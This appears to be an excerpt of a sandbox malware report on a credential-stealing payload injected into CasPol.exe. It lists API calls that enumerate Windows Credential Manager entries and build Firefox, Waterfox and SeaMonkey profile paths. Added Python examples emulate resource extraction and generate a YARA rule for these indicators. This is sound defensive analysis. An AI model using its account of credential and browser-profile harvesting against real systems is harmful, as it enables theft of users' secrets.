                                                                                                                  • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                                  • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                                                                  • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                                  • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
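The function above resolves a resource with FindResourceW(0, 0x32, "BIN") and copies it out with LoadResource / SizeofResource / LockResource / memcpy, the usual way a sample carries an embedded configuration blob (the report's "Found malware configuration" signature). The walker below, an added example that is neither the sample's code nor Joe Sandbox output, reproduces that lookup offline: it builds a constructed .rsrc blob at an assumed RVA, then walks the three-level IMAGE_RESOURCE_DIRECTORY tree (type, name, language) the way FindResourceW does. Which of "BIN" and 0x32 is the type and which the name cannot be settled from the argument listing alone, so both levels accept string or integer identifiers; the language step takes the first entry when none is requested, a simplification of the locale preference FindResource applies.

```python
import struct

HIGH_BIT = 0x80000000
RSRC_RVA = 0x1A000  # assumed RVA of the constructed .rsrc section (not from the sample)


def _key(x):
    # Windows matches resource strings case-insensitively; MAKEINTRESOURCE ids are plain ints.
    return x.upper() if isinstance(x, str) else x


def build_rsrc(tree, rsrc_rva=RSRC_RVA):
    """Serialise {type: {name: {lang: bytes}}} into a .rsrc blob (offsets relative to the blob)."""
    types = list(tree)
    names = [(t, n) for t in types for n in tree[t]]
    leaves = [(t, n, l) for t, n in names for l in tree[t][n]]
    strs = {x for x in types + [n for _, n in names] + [l for *_, l in leaves] if isinstance(x, str)}
    # Layout: root dir, type dirs, name dirs, data entries, name strings, payloads.
    off, cur = {}, 0
    for key, size in ([("root", 16 + 8 * len(types))]
                      + [(("dir", t), 16 + 8 * len(tree[t])) for t in types]
                      + [(("dir", t, n), 16 + 8 * len(tree[t][n])) for t, n in names]
                      + [(("ent",) + leaf, 16) for leaf in leaves]
                      + [(("str", s), 2 + 2 * len(s)) for s in strs]
                      + [(("dat",) + leaf, len(tree[leaf[0]][leaf[1]][leaf[2]])) for leaf in leaves]):
        off[key] = cur
        cur += size
    blob = bytearray(cur)

    def put_dir(at, entries):  # entries: (ident, target, is_subdir); named first, then ids, both sorted
        named = sorted((e for e in entries if isinstance(e[0], str)), key=lambda e: e[0].upper())
        ids = sorted((e for e in entries if isinstance(e[0], int)), key=lambda e: e[0])
        struct.pack_into("<IIHHHH", blob, at, 0, 0, 0, 0, len(named), len(ids))
        for i, (ident, target, sub) in enumerate(named + ids):
            name_f = (HIGH_BIT | off[("str", ident)]) if isinstance(ident, str) else ident
            struct.pack_into("<II", blob, at + 16 + 8 * i, name_f, (HIGH_BIT | target) if sub else target)

    put_dir(off["root"], [(t, off[("dir", t)], True) for t in types])
    for t in types:
        put_dir(off[("dir", t)], [(n, off[("dir", t, n)], True) for n in tree[t]])
    for t, n in names:
        put_dir(off[("dir", t, n)], [(l, off[("ent", t, n, l)], False) for l in tree[t][n]])
    for t, n, l in leaves:
        payload, d = tree[t][n][l], off[("dat", t, n, l)]
        # IMAGE_RESOURCE_DATA_ENTRY: OffsetToData is an RVA, then Size, CodePage, Reserved
        struct.pack_into("<IIII", blob, off[("ent", t, n, l)], rsrc_rva + d, len(payload), 0, 0)
        blob[d:d + len(payload)] = payload
    for s in strs:  # IMAGE_RESOURCE_DIR_STRING_U: u16 length, then UTF-16LE characters
        struct.pack_into("<H", blob, off[("str", s)], len(s))
        blob[off[("str", s)] + 2:off[("str", s)] + 2 + 2 * len(s)] = s.encode("utf-16le")
    return bytes(blob)


def _entries(blob, at):
    """Yield (ident, target_offset, is_subdir) for the IMAGE_RESOURCE_DIRECTORY at `at`."""
    n_named, n_id = struct.unpack_from("<HH", blob, at + 12)
    for i in range(n_named + n_id):
        name_f, data_f = struct.unpack_from("<II", blob, at + 16 + 8 * i)
        if name_f & HIGH_BIT:
            s = name_f & 0x7FFFFFFF
            (n,) = struct.unpack_from("<H", blob, s)
            ident = blob[s + 2:s + 2 + 2 * n].decode("utf-16le")
        else:
            ident = name_f
        yield ident, data_f & 0x7FFFFFFF, bool(data_f & HIGH_BIT)


def _descend(blob, at, wanted):
    for ident, target, sub in _entries(blob, at):
        if sub and _key(ident) == _key(wanted):
            return target
    return None


def find_resource(blob, rsrc_rva, rtype, rname, lang=None):
    """Emulate FindResourceW + LoadResource/SizeofResource/LockResource; returns bytes or None.

    lang=None takes the first language entry (real FindResource applies a locale preference first).
    """
    type_dir = _descend(blob, 0, rtype)
    name_dir = _descend(blob, type_dir, rname) if type_dir is not None else None
    if name_dir is None:
        return None
    hits = [t for i, t, sub in _entries(blob, name_dir) if not sub and (lang is None or _key(i) == _key(lang))]
    if not hits:
        return None
    rva, size, _cp, _rsv = struct.unpack_from("<IIII", blob, hits[0])
    start = rva - rsrc_rva  # translate the RVA back to a blob offset
    if start < 0 or start + size > len(blob):
        return None
    return bytes(blob[start:start + size])


# Constructed image: a "BIN"/0x32 resource as the listing shows, beside an ordinary version resource.
CONSTRUCTED_CONFIG = b"constructed-config-blob-not-from-the-sample"
SAMPLE_RSRC = build_rsrc({"BIN": {0x32: {0x409: CONSTRUCTED_CONFIG}},
                          16: {1: {0x409: b"VS_VERSION_INFO placeholder"}}})


def extract_bin_resource(blob=SAMPLE_RSRC, rsrc_rva=RSRC_RVA):
    """The listed function's effect: locate BIN/0x32 and copy SizeofResource bytes out."""
    return find_resource(blob, rsrc_rva, "BIN", 0x32)


if __name__ == "__main__":
    print(extract_bin_resource())
```

Against a real dump, the same walker runs over the .rsrc section bytes with the section's RVA from the section header; since the data entry stores an RVA, a resource whose OffsetToData points outside the section (as in a dump with holes) comes back as None rather than as garbage.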
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                                    • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                                    • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                                    • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                                    • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                                  • CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                                  • wcslen.MSVCRT ref: 0040BE06
                                                                                                                  • wcsncmp.MSVCRT ref: 0040BE38
                                                                                                                  • memset.MSVCRT ref: 0040BE91
                                                                                                                  • memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                                  • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                                                                                  • wcschr.MSVCRT ref: 0040BF24
                                                                                                                  • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc$CredEnumerateFreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 697348961-0
                                                                                                                  • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                                                  • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                                                                                  • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                                                  • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 00403CBF
                                                                                                                  • memset.MSVCRT ref: 00403CD4
                                                                                                                  • memset.MSVCRT ref: 00403CE9
                                                                                                                  • memset.MSVCRT ref: 00403CFE
                                                                                                                  • memset.MSVCRT ref: 00403D13
                                                                                                                    • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                    • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                    • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                    • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                  • memset.MSVCRT ref: 00403DDA
                                                                                                                    • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                    • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                                                                  • String ID: Waterfox$Waterfox\Profiles
                                                                                                                  • API String ID: 3527940856-11920434
                                                                                                                  • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                                  • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                                                                  • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                                  • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 00403E50
                                                                                                                  • memset.MSVCRT ref: 00403E65
                                                                                                                  • memset.MSVCRT ref: 00403E7A
                                                                                                                  • memset.MSVCRT ref: 00403E8F
                                                                                                                  • memset.MSVCRT ref: 00403EA4
                                                                                                                    • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                    • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                    • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                    • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                  • memset.MSVCRT ref: 00403F6B
                                                                                                                    • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                    • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                                                                  • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                                                  • API String ID: 3527940856-2068335096
                                                                                                                  • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                                                  • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                                                                  • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                                                  • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 00403FE1
                                                                                                                  • memset.MSVCRT ref: 00403FF6
                                                                                                                  • memset.MSVCRT ref: 0040400B
                                                                                                                  • memset.MSVCRT ref: 00404020
                                                                                                                  • memset.MSVCRT ref: 00404035
                                                                                                                    • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                    • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                    • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                    • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                  • memset.MSVCRT ref: 004040FC
                                                                                                                    • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                    • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                                                                  • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                                                  • API String ID: 3527940856-3369679110
                                                                                                                  • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                                                  • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                                                                  • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                                                  • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
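The four functions above describe one capability of the injected payload: the first enumerates the Windows Credential Manager (CredEnumerateW, then wcsncmp/_wcsnicmp filtering of the returned entries), and the next three build the profile directories of Gecko-based browsers (Waterfox, SeaMonkey, Firefox) from the "String ID" constants. The script below is an added example, not Joe Sandbox output and not Remcos code: it parses a constructed, whitespace-trimmed excerpt of the report lines shown above, groups them per function, extracts the credential-access indicators, renders them as a YARA rule and applies the same logic to a constructed dump buffer. The rule name, the 1-of-APIs and 2-of-paths thresholds, and the extra Cred* API names are this example's own choices.

```python
import re

# Constructed excerpt: report lines copied from the listing above with the
# table indentation removed. Only "APIs" headers, API call lines and
# "String ID" lines matter to the parser.
REPORT_EXCERPT = """\
APIs
• CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
• wcslen.MSVCRT ref: 0040BE06
• String ID:
APIs
• memset.MSVCRT ref: 00403CBF
  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
• String ID: Waterfox$Waterfox\\Profiles
APIs
• memset.MSVCRT ref: 00403E50
• String ID: Mozilla\\SeaMonkey$Mozilla\\SeaMonkey\\Profiles
APIs
• memset.MSVCRT ref: 00403FE1
• String ID: Mozilla\\Firefox$Mozilla\\Firefox\\Profiles
"""

# "• Name.MODULE(args), ref: ADDR" or "• Name.MODULE ref: ADDR", optionally
# prefixed by "Part of subcall function ADDR:" for callees the plugin inlines.
API_CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function [0-9A-F]{8}:\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>[A-Z0-9]+)"
    r"(?:\([^)]*\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-F]{8})"
)
# "• String ID: a$b$c": the plugin joins a function's string constants with '$'.
STRING_ID_RE = re.compile(r"^\s*•\s*String ID:\s*(?P<strings>.*)$")

# Credential Manager read APIs (assumption: only CredEnumerateW is in the report).
CREDENTIAL_APIS = {"CredEnumerateW", "CredEnumerateA", "CredReadW", "CredReadA"}
PROFILE_PATH_RE = re.compile(r"\\Profiles$")  # "<vendor>\<browser>\Profiles"


def parse_functions(report_text):
    """Split the report into functions; each gets its API names and strings."""
    functions, current = [], None
    for line in report_text.splitlines():
        if line.strip() == "APIs":
            current = {"apis": [], "strings": []}
            functions.append(current)
            continue
        if current is None:
            continue
        m = API_CALL_RE.match(line)
        if m:
            current["apis"].append(m.group("api"))
            continue
        m = STRING_ID_RE.match(line)
        if m:
            current["strings"].extend(s for s in m.group("strings").split("$") if s)
    return functions


def credential_indicators(functions):
    """Collect the credential-access APIs and browser profile paths seen."""
    apis, paths = set(), set()
    for fn in functions:
        apis |= CREDENTIAL_APIS & set(fn["apis"])
        paths |= {s for s in fn["strings"] if PROFILE_PATH_RE.search(s)}
    return {"apis": sorted(apis), "profile_paths": sorted(paths)}


def yara_rule(ind, name="remcos_browser_credential_access_example"):
    """Render the indicators as a YARA rule: UTF-16LE paths, ASCII import name."""
    lines = [f"rule {name}", "{", "    strings:"]
    for i, p in enumerate(ind["profile_paths"]):
        escaped = p.replace("\\", "\\\\")
        lines.append(f'        $p{i} = "{escaped}" wide')
    for i, a in enumerate(ind["apis"]):
        lines.append(f'        $a{i} = "{a}" ascii')
    lines += ["    condition:", "        1 of ($a*) and 2 of ($p*)", "}"]
    return "\n".join(lines)


def scan_dump(buf, ind):
    """Apply the rule's condition to a raw dump buffer (wide paths, ASCII API)."""
    api_hits = sum(a.encode("ascii") in buf for a in ind["apis"])
    path_hits = sum(p.encode("utf-16-le") in buf for p in ind["profile_paths"])
    return api_hits >= 1 and path_hits >= 2


def build_sample_dump():
    """Constructed stand-in for the CasPol.exe dump: the import name as the
    loader leaves it plus two of the UTF-16LE path constants."""
    return (b"MZ" + b"\x00" * 62 + b"CredEnumerateW\x00"
            + "Mozilla\\Firefox\\Profiles".encode("utf-16-le") + b"\x00\x00"
            + "Waterfox\\Profiles".encode("utf-16-le") + b"\x00\x00")


def build_benign_dump():
    # Constructed buffer: one profile path, no Credential Manager import.
    return b"MZ" + b"\x00" * 64 + "Mozilla\\Firefox\\Profiles".encode("utf-16-le")


if __name__ == "__main__":
    ind = credential_indicators(parse_functions(REPORT_EXCERPT))
    print(yara_rule(ind))
    print("sample dump matches:", scan_dump(build_sample_dump(), ind))
    print("benign dump matches:", scan_dump(build_benign_dump(), ind))
```

The two-path threshold is deliberate: a single "Mozilla\Firefox\Profiles" reference appears in legitimate software (backup tools, installers), whereas a process that carries the Waterfox, SeaMonkey and Firefox profile constants together with a Credential Manager import is behaving like the stealer routine this dump shows. The rule keys on UTF-16LE because the functions above concatenate these paths with the wide-string CRT routines (wcscpy, wcscat, _snwprintf), so that is the encoding present in memory.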
                                                                                                                  APIs
                                                                                                                  • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpy
                                                                                                                  • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                                                  • API String ID: 3510742995-2641926074
                                                                                                                  • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                                  • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                                                                  • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                                  • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                    • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                                                    • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                                                  • memset.MSVCRT ref: 004033B7
                                                                                                                  • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                                                                                  • wcscmp.MSVCRT ref: 004033FC
                                                                                                                  • _wcsicmp.MSVCRT ref: 00403439
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                                                                                  • String ID: $0.@
                                                                                                                  • API String ID: 2758756878-1896041820
                                                                                                                  • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                                                  • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                                                                  • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                                                  • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2941347001-0
                                                                                                                  • Opcode ID: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                                                                                  • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                                                                                  • Opcode Fuzzy Hash: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                                                                                  • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 00403C09
                                                                                                                  • memset.MSVCRT ref: 00403C1E
                                                                                                                    • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                                                                    • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                                                                  • wcscat.MSVCRT ref: 00403C47
                                                                                                                    • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                    • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                    • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                  • wcscat.MSVCRT ref: 00403C70
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memsetwcscat$Closewcscpywcslen
                                                                                                                  • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                                                  • API String ID: 3249829328-1174173950
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0040A824
                                                                                                                  • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                  • wcscpy.MSVCRT ref: 0040A854
                                                                                                                  • wcscat.MSVCRT ref: 0040A86A
                                                                                                                  • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                  • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 669240632-0
                                                                                                                  APIs
                                                                                                                  • wcschr.MSVCRT ref: 00414458
                                                                                                                  • _snwprintf.MSVCRT ref: 0041447D
                                                                                                                  • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                                                  • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                                  • String ID: "%s"
                                                                                                                  • API String ID: 1343145685-3297466227
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                                                                                  • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                                                  Strings
